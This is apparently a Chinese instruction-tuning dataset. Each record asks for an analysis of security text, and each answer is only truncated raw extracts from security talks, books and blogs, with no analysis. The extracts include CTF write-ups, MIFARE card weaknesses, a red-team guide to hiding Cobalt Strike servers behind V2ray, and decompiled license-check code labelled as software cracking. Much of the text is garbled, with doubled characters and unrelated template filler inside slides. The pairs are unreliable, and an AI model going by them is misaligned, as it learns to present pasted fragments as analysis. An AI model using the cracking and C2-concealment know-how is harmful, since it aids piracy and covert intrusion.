{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDevOps 实践指南精要 作者张乐 2018.04 Case Study Operation InVersion at LinkedIn (2011) 启示需要将偿还技术债作为日常工作的一部分 2011年年IPO之后的六个月LinkedIn 持续与痛苦的有问题的部署斗争 VP of Engineering决定停止所有功 能开发两个月 彻底检修环境部署架构问题 背景 2003年年成立帮助用户 connect to your network for better job opportunities. 2015年年11月数据 350 million会员每秒数万请求 后台系统每秒百万次查询请求 开始时LinkedIn主要运行行在自开发的 Leo应用上 Java单体式应用 通过Servlets服务页面并管理理与后 台很多Oracle DB的JDBC连接 随着早年年业务发展两个关键服务从 Leo分离出来 会员关系图谱在内存中 会员查询在上个服务之上 到2010年年大多数新开发使用新服 务在Leo外围有100个左右 问题是Leo 2周才发布一次 Leo系统有显著的问题 尽管可以垂直升级如内存和CPUs Leo经常在生产环境宕机 很难排查问题和回复 很难发布新的代码 每当要发布一组变更更时站点崩溃混 乱需要工程师工作到深夜解决问题 到2011年年问题已经无法忍受 需要Kill Leo分解为很多小的功能和无状态服务 VP of Engineering 决定完全停止新功能 工作整个部门修复站点的核心基础设施 业务和团队的需要 对公众宣布这一决定时是可怕的事情 好处 大量量积极的结果 创建了了全套的软件和工具帮助开发代码 不不用再等待数周让新功能上到主站 工程师可以开发新的服务 通过一系列列自动化验证发现 影响现有功能的缺陷和问题 立即发布到主站 主要升级每天三次 通过构建了了安全的工作系统创造了了价值 更更少工作到深夜 更更多时间用于开发新功能和创新 整个工程师组织都聚焦在改进工具和 部署基础架构开发生产率 成功构建了了工程敏敏捷性 2010年年有超过150个独立服务今天有超过750个 总结 LinkedIn支付了了接近10年年的技术债务 提升了了稳定性和安全性 支撑公司未来阶段的成长 代价是2个月全部的聚焦在非功能需求 以及所有承诺功能的损失 把寻找和修复问题作为日常工作的一部分管理理技 术债务我们可以避免这种 near death 的体验 API Enablement at Target (2015) 背景 Target 是美国第六大零售商 每年年花费超过 $1 billion 在技术领域 在以前需要10个不不同的团队才能完成一台Server分配 如果出现问题会停止变更更并防止进一步出现问题但这让一切更更糟 问题 获取环境和执行行部署成为开发团队的显著困难 获取需要的数据也同样困难 库存信息架构商店信息等核心 数据被锁在遗留留系统和大型机中 我们经常有多个数据来源 特别是电子商务和实体商店 由不不同团队负责 使用不不同数据结构和优先级 如果一个新的开发团队为客户构建新功能 需要3-6个月进行行集成获取所需要的数据 更更糟的是需要另外3-6个月进行行手工测试 确认没有破坏关键功能 因为是在一个紧耦合系统中 需要大量量项目经理理因为需要协调和交接 开发把时间消耗在队列列中等待而不不是 交付结果和把事情做完 需要管理理20-30不不同团队依赖和交互 这种获取和构建数据的较长的前置周期 危及了了业务目标 集成实体商店和电子商务的供应链 超出了了原有的设计目标只是从供应 商分发到商店 需要将商品送到商店和客户家中 改进点 API Enablement team 让团队需要交付能力力按天而不不是按月 让Target内部的工程师可以获取和存储需要的数据 时间约束在团队选择中扮演了了重要角色 需要团队承担工作而不不是外包出去 需要工程师技能而不不是管理理合同 为了了确保工作不不是在队里里中等待需要 拥有整个栈并且接管运维需求 引入了了很多支持持续集成和持续交付的工具 为支撑大规模增长引入Cassandra database and Kafka message broker 当改进申请权限时被告知No但是团队仍 然坚持去做因为团队知道需要它 效果 在随后的两年年API Enablement Team实现了了53个新业务能力力 集成Pinterest时非常简单 因为只需要提供自己的APIs 2014年年API Enablement Team 服务了了超过每个月15亿API调用 2015年年增长到了了每个月170亿API 调用横跨90个不不同的APIs 为了了支持这种能力力每周例例行行进行行 80次部署 业务价值 数字化销售在2014假日季增长42% 在Q2又增", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Automatically generated by Pod::Man v1.37, Pod::Parser v1.13 .\\\" .\\\" Standard preamble: .\\\" ======================================================================== .de Sh \\\" Subsection heading .br .if t .Sp .ne 5 .PP \\fB\\\\$1\\fR .PP .. .de Sp \\\" Vertical space (when we can't use .PP) .if t .sp .5v .if n .sp .. .de Vb \\\" Begin verbatim text .ft CW .nf .ne \\\\$1 .. .de Ve \\\" End verbatim text .ft R .fi .. .\\\" Set up some character translations and predefined strings. \\*(-- will .\\\" give an unbreakable dash, \\*(PI will give pi, \\*(L\" will give a left .\\\" double quote, and \\*(R\" will give a right double quote. | will give a .\\\" real vertical bar. \\*(C+ will give a nicer C++. Capital omega is used to .\\\" do unbreakable dashes and therefore won't be available. \\*(C` and \\*(C' .\\\" expand to `' in nroff, nothing in troff, for use with C<>. .tr \\(*W-|\\(bv\\*(Tr .ds C+ C\\v'-.1v'\\h'-1p'\\s-2+\\h'-1p'+\\s0\\v'.1v'\\h'-1p' .ie n \\{\\ . ds -- \\(*W- . ds PI pi . if (\\n(.H=4u)&(1m=24u) .ds -- \\(*W\\h'-12u'\\(*W\\h'-12u'-\\\" diablo 10 pitch . if (\\n(.H=4u)&(1m=20u) .ds -- \\(*W\\h'-12u'\\(*W\\h'-8u'-\\\" diablo 12 pitch . ds L\" \"\" . ds R\" \"\" . ds C` \"\" . ds C' \"\" 'br\\} .el\\{\\ . ds -- \\|\\(em\\| . ds PI \\(*p . ds L\" `` . ds R\" '' 'br\\} .\\\" .\\\" If the F register is turned on, we'll generate index entries on stderr for .\\\" titles (.TH), headers (.SH), subsections (.Sh), items (.Ip), and index .\\\" entries marked with X<> in POD. Of course, you'll have to process the .\\\" output yourself in some meaningful fashion. .if \\nF \\{\\ . de IX . tm Index:\\\\$1\\t\\\\n%\\t\"\\\\$2\" .. . nr % 0 . rr F .\\} .\\\" .\\\" For nroff, turn off justification. Always turn off hyphenation; it makes .\\\" way too many mistakes in technical documents. .hy 0 .if n .na .\\\" .\\\" Accent mark definitions (@(#)ms.acc 1.5 88/02/08 SMI; from UCB 4.2). .\\\" Fear. Run. Save yourself. No user-serviceable parts. . \\\" fudge factors for nroff and troff .if n \\{\\ . ds #H 0 . ds #V .8m . ds #F .3m . ds #[ \\f1 . ds #] \\fP .\\} .if t \\{\\ . ds #H ((1u-(\\\\\\\\n(.fu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDNS - Devious Name Services Destroying Privacy & Anonymity Without Your Consent Jim Nitterauer Senior Security Specialist Disclaimer Information disclosed in this presentation is intended to help improve your security & privacy posture and should not be used for unethical purposes The concepts presented are in no way meant to imply original research on my part or on the part of my employer Information presented here is gathered from public and private sources with proper references and credit provided where applicable The views expressed in this talk are not necessarily the views of my employer Why Am I Here? Why Am I here? http://bestvpnprovider.co/wp-content/uploads/2015/01/VPN-Blocked-in-China-The-Great-Firewall-Strikes-Again.png Why Am I here? Thank You Thank You @jack_daniel from your @BSidesLV family Agenda Review DNS, EDNS0 extensions and Option Codes Discuss the Rationale for EDNS0 Use Examine EDNS Client Subnet (ECS) Review DNS Resolver Support Examine Tools & Procedures for Testing Discuss Privacy Implications of EDNS0 OPT Codes Discuss Potential for Abuse Questions & answers Goals for Today Understand the basics about EDNS OPT RRs Understand the potential threat to your privacy Have direction for detecting the use of EDNS OPTs Be able to better insure your online privacy Brief History of DNS Brief History of DNS Introduced in 1983 by Paul Mockapetris & Jon Postel Information Sciences Institute  USC RFC 882 & RFC 883 both updated by RFC 973 in 1986 Obsoleted by two RFCs in 1987  RFC 1034  Describes the data structure and exchange of data  RFC 1035  Describes record and infrastructure format Brief History of DNS Distributed database Main components  Namespace  Resource Records (RRs)  Resolvers  Name Servers Brief History of DNS  Defining Master (Primary) / Slave (Secondary) relationship  Adding Notify  Adding IXFR (Incremental Zone Transfers) Improved DNS by Image from https://technet.microsoft.com/en-us/library/bb962069.tcpipm09_big(l=en-us).gif Brief Hist", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCybrics CTF Nu1L Writeup Team Page:https://nu1l-ctf.com Cybrics CTF Nu1L Writeup Disk Data Description Solution QShell Description Solution Caesaref Description Solution Hidden Flag Description Solution Paranoid Description Solution Sender Description Solution Matreshka Description Solution Oldman Reverse Description Solution NopeSQL Description Solution Bitkoff Bank Description Solution ProCTF Description Solution Fast Crypto Description Solution Cirquits Description Solution Battleships Description Solution Tone Description Solution Dock Escape Description Solution Fixaref Description Solution Telegram Description Solution Fake TCP Description Solution Game Description Solution Samizdat Description Solution Disk Data Status: Completed Tag: MISC Description Author: Khanov Artur (awengar) Disk dump hides the flag. Obtain it data2.zip.torrent Solution .bash_historyImageMagick Mistyimgur QShell Status: Completed Tag: Cyber Description Author: Khanov Artur (awengar) QShell is running on nc spbctf.ppctf.net 37338 Grab the flag https://github.com/alishtory/qrcode-terminal/blob/master/qrcode_terminal/qrcode_terminal.py Solution jio, def qr_terminal_str(str,version=1): if platform.system() == \"Windows\": white_block = '' black_block = ' ' new_line = '\\n' else: white_block = '' black_block = ' ' new_line = '\\n'  ls                                                                                                                                                                                                                                                                                              :                                                                                                                                                                                                                                                                                                                                                                                                     ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# AES ## 基本介绍 Advanced Encryption StandardAES高级加密标准是典型的块加密被设计来取代 DES由 Joan Daemen 和 Vincent Rijmen 所设计其基本信息如下 - 输入128 比特 - 输出128 比特 - SPN 网络结构 其迭代轮数与密钥长度有关系如下 | 密钥长度比特 | 迭代轮数 | | :--------------: | :------: | | 128 | 10 | | 192 | 12 | | 256 | 14 | ## 基本流程 ### 基本概念 在 AES 加解密过程中每一块都是 128 比特所以我们这里明确一些基本概念 在 AES 中块与 State 之间的转换过程如下 所以可以看出每一个 block 中的字节是按照列排列进入到状态数组的 而对于明文来说一般我们会选择使用其十六进制进行编码 ### 加解密过程 这里给个看雪上比较好的 [图例](http://bbs.pediy.com/thread-90722.htm) 以便于介绍基本的流程每一轮主要包括 - 轮密钥加AddRoundKey - 字节替换SubBytes - 行移位ShiftRows - 列混淆MixColumns 上面的列混淆的矩阵乘法等号左边的列向量应该在右边 这里再给一张其加解密的全图其解密算法的正确性很显然 我们这里重点关注一下以下 #### 字节替换 在字节替换的背后其实是有对应的数学规则来定义对应的替换表的如下 这里的运算均定义在 $GF(28)$ 内 #### 列混淆 这里的运算也是定义在 $GF(28)$ 上使用的模多项式为 $x8+x4+x3+1$ #### 密钥扩展 ## 等价解密算法 简单分析一下我们可以发现 - 交换逆向行移位和逆向字节代替并不影响结果 - 交换轮密钥加和逆向列混淆并不影响结果关键在于 - 首先可以把异或看成域上的多项式加法 - 然后多项式中乘法对加法具有分配率 ## 攻击方法 - 积分攻击 ## 2018 国赛 Crackmec 通过简单分析这个算法我们可以发现这个算法是一个简化版的 AES其基本操作为 - 9 轮迭代 - 行移位 - 变种字节替换 如下 ```c memcpy(cipher, plain, 0x10uLL); for ( i = 0LL; i <= 8; ++i ) { shift_row(cipher); for ( j = 0LL; j <= 3; ++j ) *(_DWORD *)&cipher[4 * j] = box[((4 * j + 3 + 16 * i) << 8) + (unsigned __int8)cipher[4 * j + 3]]  box[((4 * j + 2 + 16 * i) << 8) + (unsigned __int8)cipher[4 * j + 2]]  box[((4 * j + 1 + 16 * i) << 8) + (unsigned __int8)cipher[4 * j + 1]]  box[((4 * j + 16 * i) << 8) + (unsigned __int8)cipher[4 * j]]; } result = shift_row(cipher); for ( k = 0LL; k <= 0xF; ++k ) { result = subbytes[256 * k + (unsigned __int8)cipher[k]]; cipher[k] = result; } return result; ``` 根据程序流程我们已知程序加密的结果而 subbytes 和 shift_row 又是可逆的所以我们可以获取最后一轮加密后的结果此时我们还知道 box 对应的常数我们只是不知道上一轮中 `cipher[4*j]` 对应的值一共 32 位如果我们直接爆破的话显然不可取因为每一轮都需要这么爆破时间不可接受那么有没有其它办法呢其实有的我们可以考虑中间相遇攻击即首先枚举所有的 `cipher[4*j]` 与`cipher[4*j+1]` 的字节组合一共256\\*256 种在枚举剩下两个字节时我们可以先计算出其与密文的异或值然后去之前的组合中找如果找到的话我们就认为是正确的这样复杂度瞬间降到 $O(2{16})$ 代码如下 ```python encflag = [ 0x16, 0xEA, 0xCA, 0xCC, 0xDA, 0xC8, 0xDE, 0x1B, 0x16, 0x03, 0xF8, 0x84, 0x69, 0x23, 0xB2, 0x25 ] subbytebox = eval(open('./subbytes').read()) box = ev", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nE VA DING E DR A C O M P R E H E N S I V E G U I D E T O D E F E A T I N G E N D P O I N T D E T E C T I O N S Y S T E M S M A T T H A N D placeholder NOT FINAL EARLY ACCESS NO S TA RCH PR E S S E A R LY ACCE S S PROG R A M: F E E DBACK W E L COME ! Welcome to the Early Access edition of the as yet unpublished Evading EDR by Matt Hand! As a prepublication title, this book may be incomplete and some chapters may not have been proofread. Our goal is always to make the best books possible, and we look forward to hearing your thoughts. If you have any comments or questions, email us at earlyaccess@nostarch.com. If you have specific feedback for us, please include the page number, book title, and edition date in your note, and well be sure to review it. We appreciate your help and support! Well email you as new chapters become available. In the meantime, enjoy! E VA DING E DR M AT T H A N D Early Access edition, 05/24/23 Copyright  2023 by Matt Hand. ISBN-13: 978-1-7185-0334-2 (print) ISBN-13: 978-1-7185-0335-9 (ebook) Publisher: William Pollock Managing Editor: Jill Franklin Production Manager: Sabrina Plomitallo-González Production Editor: Jennifer Kepler Developmental Editor: Frances Saux Interior Design: Octopod Studios Technical Reviewer: Joe Desimone Copyeditor: Audrey Doyle No Starch Press and the No Starch Press logo are registered trademarks of No Starch Press, Inc. Other product and company names mentioned herein may be the trademarks of their respective owners. Rather than use a trademark symbol with every occurrence of a trade- marked name, we are using the names only in an editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the trademark. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, or by any informa- tion storage or retrieval system, without the prior written permission of the copyright owner a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH CHCON 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 chcon \\- 修改文件安全上下文 .SH 概述 \\fBchcon\\fP [\\fI\\,选项\\/\\fP]... \\fI\\,上下文 文件\\/\\fP... .br \\fBchcon\\fP [\\fI\\,选项\\/\\fP]... [\\fI\\,\\-u 用户\\/\\fP] [\\fI\\,\\-r 角色\\/\\fP] [\\fI\\,\\-l 范围\\/\\fP] [\\fI\\,\\-t 类型\\/\\fP] \\fI\\,文件\\/\\fP... .br \\fBchcon\\fP [\\fI\\,选项\\/\\fP]... \\fI\\,\\-\\-reference=参考文件 文件\\/\\fP... .SH 描述 .\\\" Add any additional description here .PP 将每个指定文件的安全上下文变更至指定上下文使用 \\fB\\-\\-reference\\fP 选项时把指定文件的安全上下文设置为与参考文件相同 .PP 必选参数对长短选项同时适用 .TP \\fB\\-\\-dereference\\fP 影响每个符号链接的原始引用文件这是默认行为而非符号链接本身 .TP \\fB\\-h\\fP, \\fB\\-\\-no\\-dereference\\fP 只影响符号链接而非被引用的任何文件 .TP \\fB\\-u\\fP, \\fB\\-\\-user\\fP=\\fI\\,用户\\/\\fP 设置指定用户的目标安全上下文 .TP \\fB\\-r\\fP, \\fB\\-\\-role\\fP=\\fI\\,角色\\/\\fP 设置指定角色的目标安全上下文 .TP \\fB\\-t\\fP, \\fB\\-\\-type\\fP=\\fI\\,类型\\/\\fP 设置指定类型的目标安全上下文 .TP \\fB\\-l\\fP, \\fB\\-\\-range\\fP=\\fI\\,范围\\/\\fP 设置指定范围的目标安全上下文 .TP \\fB\\-\\-no\\-preserve\\-root\\fP 不特殊对待/默认行为 .TP \\fB\\-\\-preserve\\-root\\fP 不允许在/上递归操作 .TP \\fB\\-\\-reference\\fP=\\fI\\,参考文件\\/\\fP 使用指定参考文件的安全上下文而非指定的上下文值 .TP \\fB\\-R\\fP, \\fB\\-\\-recursive\\fP 递归操作文件和目录 .TP \\fB\\-v\\fP, \\fB\\-\\-verbose\\fP 为每个处理的文件输出诊断信息 .PP 以下选项是在指定了 \\fB\\-R\\fP 选项时被用于设置如何遍历目录结构体系如果您指定了多于一个选项那么只有最后一个会生效 .TP \\fB\\-H\\fP 如果命令行参数是一个指向目录的符号链接则对其进行遍历 .TP \\fB\\-L\\fP 遍历每一个遇到的指向目录的符号链接 .TP \\fB\\-P\\fP 不遍历任何符号链接默认 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .SH 作者 由 Russell Coker 和 Jim Meyering 编写 .SH 报告错误 GNU coreutils 的在线帮助 <https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. .SH ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEE可视化工具 软件破解 认证过程 系统使用 struts2 框架开发通过在 struts2.xml 配置文件当中找到过滤器获取到认证程序 com.seeyon.dee.configurator.interceptor.SerialInterceptor // // Source code recreated from a .class file by IntelliJ IDEA // (powered by FernFlower decompiler) // package com.seeyon.dee.configurator.interceptor; import com.opensymphony.xwork2.ActionContext; import com.opensymphony.xwork2.ActionInvocation; import com.opensymphony.xwork2.interceptor.MethodFilterInterceptor; import com.seeyon.v3x.dee.common.base.util.AuthorizeUtil; import com.seeyon.v3x.dee.common.base.util.Encipher; import com.seeyon.v3x.dee.util.DataChangeUtil; import java.io.File; import java.io.FileInputStream; import java.io.InputStream; import java.text.ParseException; import java.text.SimpleDateFormat; import java.util.Calendar; import java.util.Date; import java.util.Properties; import javax.servlet.http.HttpServletRequest; public class SerialInterceptor extends MethodFilterInterceptor { private static final long serialVersionUID = 4085963428017959650L; private static final String filePath = DataChangeUtil.getRealPath(\"/\") + \"config\" + \"/serial.properties\"; public SerialInterceptor() { } protected String doIntercept(ActionInvocation invocation) throws Exception { ActionContext actionContext = invocation.getInvocationContext(); HttpServletRequest request = (HttpServletRequest)actionContext.get(\"com.opensymphony.xwork2.dispatcher.HttpSe rvletRequest\"); String errorMsg = \"\"; InputStream in = new FileInputStream(filePath); Properties property = new Properties(); property.load(in); in.close(); String keycode = property.getProperty(\"KeyCode\"); String SerialNumber = property.getProperty(\"SerialNumber\"); String encode_authorizeDate = property.getProperty(\"AuthorizeDate\"); String authorizeDate = Encipher.Decode(encode_authorizeDate); String encode_deadline = property.getProperty(\"Deadline\"); String deadline = Encipher.Decode(encode_deadline); String logfilesPath = DataChangeUtil.getRealPath(\"/\") + \"../../../../logs\"; File logsPath = ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKinectASploit What if you took a kinect, used it's skeleton tracking features KinectASploit Sprinkled in some hacking tools: Wait a minute!... we did that already. Lets find out! Come see the Demo at Defcon20 and look for the tool source at: http://p0wnlabs.com/defcon20 jeff bryner p0wnlabs.com Use @ your own risk", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n晶片卡弱點分析 MIFARE, ATM Card & 花博門票 Anderson Ni 倪萬昇 2010/07/01 Agenda  MIFARE 安全漏洞探討  ATM Card與網路ATM安全漏洞探討  台北國際花博覽會門票安全漏洞探討 Sector (64 bytes) Sector (64 bytes) Sector (64 bytes) Introduction of MIFARE  RF ID (ISO 14443-3 Type A with MIFARE,13.56 MHz, Distance 10 cm)  Memory Card (S50 1K bytes, S70 4K bytes) Sector (64 bytes) Block 0 (Data Block, 16 bytes) Block 1 (Data Block, 16 bytes) Block 2 (Data Block, 16 bytes) Block 3 (Key Block, 16 bytes) Sector 0 Sector 1  Sector 15 Key A(6 bytes) Access Con. Key B(6 bytes) 16 * 64 = 1024 bytes = 1K bytes Weakness I of MIFARE Key Length  Key Length of MIFARE Key A/B is 48 bits  Key length of Triple DES is 112 or 168 bits and key length of AES is 128 , 192 or 256 bits  Key wont lock even if key authentication failed too many times! Brute Force Attack!!!!! (圖片來自於網路) => By the thesis, we can use 100 reader at the same time to get 1 key in 2 weeks Weakness II of MIFARE Random Number Generator  The Random Number Generator is designed by LFSR-32 bits  But the seed is decided by the value of timer and the timer will start to count from power on  If We can control the timing we can control the random number! Weakness III of MIFARE Crypto 1 Algorithm LFSR 48 Table + + + LFSR 16 expend to 32 bit Key Stream Ntag Ntag Tag UID NR Key A/B Three Pass Authentication TAG Reader Auth Block (Key A / B) Ntag Nr  KS1, Suc2(Ntag)  KS2 Suc3(Ntag)  KS3 Anti-Collision & Select Card (UID) MIFARE Against from Weakness  防偽驗證碼 (by DES or Triple-DES)  黑名單機制與卡片鎖卡旗標  除特定消費方式,大部分交通應用或小額 消費均有攝影機 Introduction of ATM Card  Personal Data (Account, Bank ID.. etc)  User PIN  Authentication Keys between Bank and Card  Supporting DES, Triple-DES and TAC algorithm  Secured Hardware with EAL 4+ Transaction of ATM Card ATM Card Server of Bank Verify PIN Response Select File and Get Data Response Generate TAC TAC Response Account Transfer Weakless : PIN明碼傳輸 Weakless : Verify PIN後可 產生多次TAC Weakless : 中心無提 供必要資訊給ATM Card 作為產生 TAC 用 Transaction of ATM Card ATM Card Server of", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nI'LL SEE YOUR MISSLE AND RAISE YOU A MIRV: DEFCON 26 01 02 04 03 AGENDA PRESENTERS STAGERS, CCDC, & HISTORY Trampoline Malware(s) Exploit Payload Dropper Empire Pupy Meterpreter Professional offensive engagements (CCDC) Context aware implant solutions As a form of packing 3rd party crimeware. Now we're ready to release a re-written, shiny new V1.0 version to you today! Genesis Scripting Engine development started in late 2017 to prepare for the 2018 CCDC season. We ended up using the BETA version at WRCCDC and NCCDC in 2018. Moved our tool chain to a golang, known as Gooby. This included a golang dropper experiment to abstract dropping from the other cluster bomb tools, known as Genesis. PRESENTING THE GENESIS SCRIPTING ENGINE GSCRIPT STANDARD LIBRARY COMMAND LINE TOOL (CLI) DEBUGGER ENGINE COMPILER OBFUSCATOR BASIC EXAMPLE: EMBED A PAYLOAD AND WRITE TO A FILE 1) Write a gscript 01:00  02:00 PM Investment generally results in acquiring an asset, also called an investment. If the asset is available at a price worth investing, normally expected either to generate income, or to appreciate in value OUR PORTFOLIO 10:00  11:00 AM Investment generally results in acquiring an asset, also called an investment. If the asset is available at a price worth investing, normally expected either to generate income, or to appreciate in value WELCOME MESSAGE 11:00  12:00 PM Investment generally results in acquiring an asset, also called an investment. If the asset is available at a price worth investing, normally expected either to generate income, or to appreciate in value ABOUT US 12:00  01:00 PM Investment generally results in acquiring an asset, also called an investment. If the asset is available at a price worth investing, normally expected either to generate income, or to appreciate in value MEET THE TEAM 1) Write a gscript 01:00  02:00 PM Investment generally results in acquiring an asset, also called an investment. If the asset is available at a price worth investing, normall", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2021/7/31 红队必备技能之隐蔽的技巧 https://mp.weixin.qq.com/s/428TFr-dyK61y5dZSzGDUw 1/19 红队必备技能之隐蔽的技巧 收录于话题 #技术备存 11 #漏洞 13 #僵尸网络 9 #CTF 9 #AWD 7 正文共4951字 27图 预计阅读时间13分钟 1平时在做安全测试时相信很多小伙伴在建立Cobalt Strike服务端时都是直接使用IP地址 后进行直连之前也爆出过Cobalt Strike空格特征可以通过构造规则针对全球的具有这类 特征的HTTP响应进行服务器抓取难道要频繁更换IP吗更新版本就不会出现新的特征吗 相关信息https://github.com/fox-it/cobaltstrike-extraneous-space 2每当各种重大活动时经常会出现大面积SS/SSR通信异常又要频繁更换IP吗搬瓦工的 Just My Socks提供自动监测并自动换IP功能在众多小伙伴的使用下还会香吗 3基于以上2个问题及其他多种因素并有了产生此次试验的目的 - 备注本方式仅作为抛砖引玉看官请轻拍~ - 更新于2020-01-13 - 版本2.0 一测试环境 + 系统版本Ubuntu 18.04.3 LTS + V2ray版本 原创 Kobe Fans 小生观察室 2020-06-11 2021/7/31 红队必备技能之隐蔽的技巧 https://mp.weixin.qq.com/s/428TFr-dyK61y5dZSzGDUw 2/19 - 客户端v2rayN 2.42 - 服务端v4.22.1 + Nginx版本nginx/1.17.7 + VPS 1H1G Part 1.1 测速 选择延迟率相对较低的VPS测试方法 在 UbuntuDebianFedoraCentOSRHEL上一样可以执行 Part 1.2 修改系统时区 V2ray相比SS更需要时间上的准确性,客户端和服务端时差缩小至30s内 rm /etc/localtime ln -s /usr/share/zoneinfo/Asia/Shanghai /etc/localtime 二域名注册 Part 2.1 免费域名 + [freenom](https://www.freenom.com) root@test:/# curl -s https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtes Retrieving speedtest.net configuration... Testing from Google (8.8.8.8)... Retrieving speedtest.net server list... Selecting best server based on ping... Hosted by Ixnium Technologies (Tokyo) [13.11 km]: 1.247 ms Testing download speed.................................................................... Download: 6666.57 Mbit/s Testing upload speed...................................................................... Upload: 6666.11 Mbit/s 2021/7/31 红队必备技能之隐蔽的技巧 https://mp.weixin.qq.com/s/428TFr-dyK61y5dZSzGDUw 3/19 此处以免费的域名做案例演示 Part 2.2 收费域名 尽可能不使用国内的域名商 + [namecheap](https://www.namecheap.com/) + [阿里云万网](https://wanwang.aliyun.com/) + [腾讯云DNSPod](https://dnspod.cloud.tencent.com/) + [namesilo](https://www.namesilo.com/) + [godaddy](https://sg.godaddy.com/zh) Part 2.3 注册方法 先注册一个freenom的账号登陆上去点击菜单的 Services 选择 Register a New Domain 选择一个域名点击 Get it now 完成后点击 Checkout 进入下一步 2021/7/31 红队必备技能之隐蔽的技巧 https://mp.weixin.qq.com/s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 威胁情报的生命周期 <img src=\"https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200814121735.png\" style=\"zoom:50%;\" /> 图威胁情报的生命周期[1] ## 一个中心 > Plan企业威胁情报计划这里的Plan实际上是指安全管理团队针对威胁情报所指定的情报计划情报计划应包括威胁情报对应的安全风险点包括但不限于业务安全IT资产安全对应情报大类包括但不限于战术情报战略情报运营情报二次生产情报情报小类包括但不限于pDNS情报Whois情报钓鱼网站情报黑产情报以及闭环跟进流程一套完整的情报计划实际上是可以达到指导现有安全体系建设和改进方向作用的[2] 简单来说一个关于情报的计划是用来回答以下的几个问题**针对什么要做什么怎么做怎么安排** 对应以下的几个技术需求 - 分析和确定**安全风险点** - 业务安全 - IT资产安全 - ... - 关于**情报大类**的研究 - 按使用场景分 - 战术情报 - 战略情报 - 运营情报 - 按类型分 - 资产情报 - 事件情报 - 漏洞情报 - 威胁情报 - ... - 关于**情报小类**安全威胁情报的研究 - pDNS情报 - Whois情报 - 钓鱼网站情报 - 黑产情报 - ... - 规划**闭环跟进流程** - 组织和规划整个威胁情报的发现生产交付等整个环节 - ... ## 五个环节 ### Collection 情报收集 - 按照情报计划收集我们需要情报数据和原始数据 ### Pre-Processing & Utilization 威胁情报预处理与利用环节 - 对原始情报信息进行预处理和应用场景分析确定适用的范围和目标 ### Analysis & Production 威胁情报分析与生产 - 按照情报计划分析与处理之后的数据生产最终的情报也就是所谓的FINTEL ### Transmission 情报输送 - 输送FINTEL至客户也就是安全运营团队并使用情报 在情报传输阶段需要考虑的几个问题 - 我需要输送何种类型的情报YARA规则MD5IPtables规则etc.hotfix补丁 - 我需要输送面向何种目标的情报中间件核心技术etc. - 我需要收集目标的何种信息中间件版本操作系统版本所用技术的名称和版本 - 我需要用何种介质输送终端情报Agent规则列表运维脚本 ### Planning & Direction 威胁情报的计划优化与修订 - 制定情报计划确定我们需要交付何种类型的情报 - 情报有效期结束重新制定或修正现有的情报计划进入下一个循环 ## 相关参考 - https://zhuanlan.zhihu.com/p/129064940 - https://zhuanlan.zhihu.com/p/38532724 - https://zhuanlan.zhihu.com/binandhex ## References \\[1] 从EDR到威胁情报运营浅谈终端化的情报部署, [e1knot](https://www.zhihu.com/people/elknot), https://zhuanlan.zhihu.com/p/38009342 \\[2] 浅谈威胁情报从甲方运营到乙方交付, [e1knot](https://www.zhihu.com/people/elknot), https://zhuanlan.zhihu.com/p/38532724", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWin at Reversing API Tracing and Sandboxing through Inline Hooking Nick Harbour 2 Agenda  Reverse Engineering Primer  Approaches to Dynamic Analysis  Inline Hooks  Advantages Over Other Techniques  Usages 3 Reverse Engineering Primer  Reverse Engineering techniques can be devided into two categories: Static and Dynamic Analysis  Static Analysis  Techniques which do not involve running the code  Disassembly, file structure analysis, strings, etc.  Dynamic Analysis  Techniques which involve running the code  Behavioral analysis 4 Approaches to Dynamic Analysis  Network Monitoring  Isolated Physical Networks  Virtual Networks  Hardware Emulation  Norman Sandbox et al.  Kernel-Level Monitoring (SSDT hooks)  Sysinternals Process Monitor  Debuggers 5 Kernel-Level Monitoring SSDT User Mode Process Kernel32.dll Ntdll.dll Calls CreateFile() Kernel ZwCreateFile() System Call Performed 6 Kernel-Level Monitoring SSDT User Mode Process Kernel32.dll 